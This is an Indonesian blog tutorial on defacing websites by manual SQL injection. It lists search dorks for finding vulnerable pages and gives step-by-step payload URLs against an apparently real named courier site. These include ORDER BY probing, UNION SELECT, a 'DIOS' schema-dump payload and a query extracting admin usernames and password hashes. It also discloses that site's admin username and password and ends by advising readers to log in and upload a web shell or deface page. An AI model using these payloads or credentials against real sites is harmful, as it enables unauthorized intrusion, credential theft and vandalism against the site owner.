Deface SQL Injection Manual (with DIOS)

Tutorial Deface SQL MANUAL (SQL Injection With DIOS)

SQL Injection adalah teknik yang menyalahgunakan celah keamanan yang ada pada lapisan basis data sebuah aplikasi. Celah ini terjadi ketika input dari pengguna tidak disaring secara benar, contohnya adalah kolom username yang seharusnya hanya diisi dengan huruf atau angka tapi malah diisi dengan karakter lain (seperti: – = ’) sehingga penyerang menggunakan celah tersebut dengan cara memasukan query dari SQL.
~sumber https://www.i-3.co.id

Dan kali ini saya akan berbagi ilmu "Bagaimana caranya melakukan SQL Injection secara manual'
Sebenarnya ada banyak alat yang sudah jadi untuk melakukan SQL Injection yang mudah di pakai dan di pahami seperti SQLMAP/dll, namun kali ini saya akan mengajarkan nya secara manual untuk sebagai pembelajaran.

Oke kita langsung saja ke tahap injeksi nya:)
Pertama siapkan dorknya:
inurl:/produce.php?id=
inurl:/data.php?id=
inurl:/news.php=id=
inurl:index.php?id=
inurl:index.php?cat_id=
(Dork kembangin sendiri gan)

Dorking terlebih dahulu menggunakan dork yang di atas ke google search atau mesin pencari lainnya.

Setelah anda mendapatkan target untuk di inject, tambahkan tanda petik (') di akhir url
contoh : http://www.kesaricourier.in/index.php?pid=news-details&id=2'

jika halaman nya menjadi error kemungkinan webnya vuln/rentan sqli
Untuk errornya berbeda beda contohnya akan ada teks seperti ini "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"

OKE lanjut :)
sekarang tambahkan ' order by 1--+-
contoh : http://www.kesaricourier.in/index.php?pid=news-details&id=2' order by 1--+-
Jika webnya tidak error maka teruskan sampai ada yang error
Ex:
http://www.kesaricourier.in/index.php?pid=news-details&id=2' order by 1--+- (ga error)
http://www.kesaricourier.in/index.php?pid=news-details&id=2' order by 2--+-(ga error)
http://www.kesaricourier.in/index.php?pid=news-details&id=2' order by 3--+-(ga error)
http://www.kesaricourier.in/index.php?pid=news-details&id=2' order by 3--+-(ga error)
http://www.kesaricourier.in/index.php?pid=news-details&id=2' order by 4--+-(ga error)
http://www.kesaricourier.in/index.php?pid=news-details&id=2' order by 5--+-(ga error)
http://www.kesaricourier.in/index.php?pid=news-details&id=2' order by 6--+-(ga error)
http://www.kesaricourier.in/index.php?pid=news-details&id=2' order by 7--+-(ERROR?)

nah jika tidak errornya sampai 6 berarti jumlah colom nya ada 6

Oke lanjut :)
Sekarang kita union select
http://www.kesaricourier.in/index.php?pid=news-details&id=-2' union select 1,2,3,4,5,6--+-
Perhatikan!!
ganti order by menjadi union select, dan juga tambahkan min (-) di sebelum angka
Jika berhasil maka akan ada nomer yang muncul di web seperti ini.

nah yang kita ambil adalah angkanya.
Sekarang kita Exploit dengan Dios
http://www.kesaricourier.in/index.php?pid=news-details&id=-2' union select 1,EXPLOITNYA,3,4,5,6--+-

Dios:

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Jadi seperti ini :
http://www.kesaricourier.in/index.php?pid=news-details&id=-2' union select 1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6--+-

Dan akan menampilkan data yang ada di database

jika sudah seperti itu carilah table yang mengandung unsur admin² seperti admin/users/administrator/dll
Sekarang kita akan mengambil isi username dan password dari tabel admin
http://www.kesaricourier.in/index.php?pid=news-details&id=-2' union select 1,injectquery,3,4,5,6--+-

/*!50000(SELECT+GROUP_CONCAT(username,0x3a, password+SEPARATOR+0x3c62723e)+FROM+admin)*/

contoh :
http://www.kesaricourier.in/index.php?pid=news-details&id=-2' union select 1,/*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+admin)*/,3,4,5,6--+-

Dan kurang lebih akan menghasilkan username dan password

Nah itu adalah username dan password web yang ingin kita hack,
Karena web yang saya hack ini menggunakan md5 di password nya maka kita harus decrypt md5nya terlebih dahulu,

Cari di google banyak web nya untuk decrypt md5 oke:)

Jika sudah di decryp sekarang kita cari halaman login webnya, biasanya /admin/administrator/login jika tidak ada cari menggunakan tools admin finder

Info yang saya daptkan:
username : akash
password : akash@123

Sekarang kita login

Isi dengan yang kita dapatkan dan akan masuk ke halaman dashboard admin

 Seperti itu dan tinggal upload Shell atau upload script html deh, selesai

Terimakasih sudah mampir ke blog saya yang sederhana ini :)
Jangan lupa cek halaman lain ya, biar makin banyak ilmu. Ok. Bye :)